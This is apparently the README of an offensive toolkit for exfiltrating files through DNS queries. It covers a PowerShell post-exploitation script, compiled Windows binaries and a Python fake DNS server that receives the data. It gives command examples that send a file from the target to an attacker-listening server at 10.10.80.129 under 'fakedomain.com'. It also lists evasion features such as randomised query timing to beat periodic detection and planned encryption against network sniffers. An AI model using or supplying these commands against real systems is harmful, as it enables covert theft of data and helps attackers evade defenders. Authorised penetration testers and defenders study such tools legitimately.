Simple penetration testing tools to execute file exfiltration through DNS and avoid common detection methods.
Modules caption:
✔️ Available
🔵 Under development
⚪ To be developed
Deploy these tools on the target machine to exfiltrate files through DNS requests. I'm still developing the client side for more than one programming language, to provide more compatibility with the system you are testing.
| Language | Available | Compression | Encryption |
|---|---|---|---|
| python3 | :heavy_check_mark: | :large_blue_circle: | :large_blue_circle: |
| powershell | :heavy_check_mark: | :large_blue_circle: | :large_blue_circle: |
| python2 | :large_blue_circle: | :white_circle: | :white_circle: |
| x86 Win binaries | :heavy_check_mark: | :white_circle: | :white_circle: |
| x64 Win binaries | :heavy_check_mark: | :white_circle: | :white_circle: |
Use the cmdlet Get-Help to get execution informations. You can use Get-Help -detailed to print a decent overview.
Here is an instance:
NAME
C:\Users\User\Desktop\dnsexfil.ps1
SYNOPSIS
Post-exploitation tool to execute DNS exfiltration to your pentesting machine
SYNTAX
C:\Users\User\Desktop\dnsexfil.ps1 [-Server] <String> [-Domain] <String> [-File] <String> [[-Timeout] <Single>]
[[-Length] <Int32>] [-Hash] [<CommonParameters>]
DESCRIPTION
Post-exploitation tool to execute DNS exfiltration to your pentesting machine
At leats three parameters are needed:
- Specify DNS resolver as Server parameter
- Specify filename
- Specify the fake or legit domain you want to query
The fakeDNS-server must be listening on your machine
PARAMETERS
-Server <String>
(Required) IP address of the listening DNS resolver
-Domain <String>
(Required) Fake or legit domain for DNS queries. Your fakeDNS-server will answer to both
-File <String>
(Required) Path to the file to exfiltrate through DNS queries
-Timeout <Single>
(Optional) Set a timeout between queries to slow down or speed up exfiltration. Default value is 2s
-Length <Int32>
(Optional) Set the third domain length. Default value is 16
-Hash [<SwitchParameter>]
(Optional) Include hash calculation in exfiltration for integrity purposes
<CommonParameters>
This cmdlet supports the common parameters: Verbose, Debug,
ErrorAction, ErrorVariable, WarningAction, WarningVariable,
OutBuffer, PipelineVariable, and OutVariable. For more information, see
about_CommonParameters (https:/go.microsoft.com/fwlink/?LinkID=113216).
-------------------------- EXAMPLE 1 --------------------------
PS C:\>.\dnsexfil.ps1 -Server 10.10.80.129 -d fakedomain.com -File C:\Users\Name\file.txt
Use 10.10.80.129 as the fakeDNS-server, and send the file C:\Users\Name\file.txt asking for resolution of [***].fakedomain.com:
-------------------------- EXAMPLE 2 --------------------------
PS C:\>.\dnsexfil.ps1 -Server 10.10.80.129 -d fakedomain.com -File C:\Users\Name\file.txt -Length 32 -Timeout 10 -Hash
DNS queries will be like [32-long-chunk].fakedomain.com and will be going out every 10 seconds
Windows binaries are the PE version of the powershell script above. I used the awesome interference-security's PS2EXE utility to quickly get the 32 and 64 bit versions.
Usage is the same as powershell's.
They are both located in rhosts-tools/WinBinaries.
| ✔️ | Set timeout between DNS requests to slow down exfiltration and prevent detection |
| ✔️ | Set random timeout between requests to prevent periodically checks detection |
| ✔️ | Set fake domain or legit domain for DNS queries, the DNS server listening on your machine will respond to both |
| ✔️ | Set custom exfiltration third level domain chunks length |
| ✔️ | Send filename as first action |
| ✔️ | Optional: md5 file hash trasmission before file content for integrity checks |
| 🔵 | Optional: print server's response as record A resolution to verify queries |
| 🔵 | Optional: Compress files to exfiltrate to speed up the process |
| ⚪ | Optional: file encryption to prevent network sniffers to rebuild exfiltrated artifacts |
| ⚪ | Optional: Send multiple files at once |
| ⚪ | Optional: Send entire directory as compressed file |
Developed with Python3, the server module will provide a simple fake DNS server to get client's queries from your attacking machine, and responde with a spoofed IP of your choice (default is google.com's).
| ✔️ | Set custom IP to spoof as record A response |
| ✔️ | Set custom domain for further automated file decode |
| ✔️ | Set custom UDP port for DNS service (default is 53) |
| 🔵 | Get filename from exfiltration first chunk |
| 🔵 | Optional: automated file decode/save |
| 🔵 | Optional: compressed files receiving capabilities |
| ⚪ | Optional: file decryption and save |
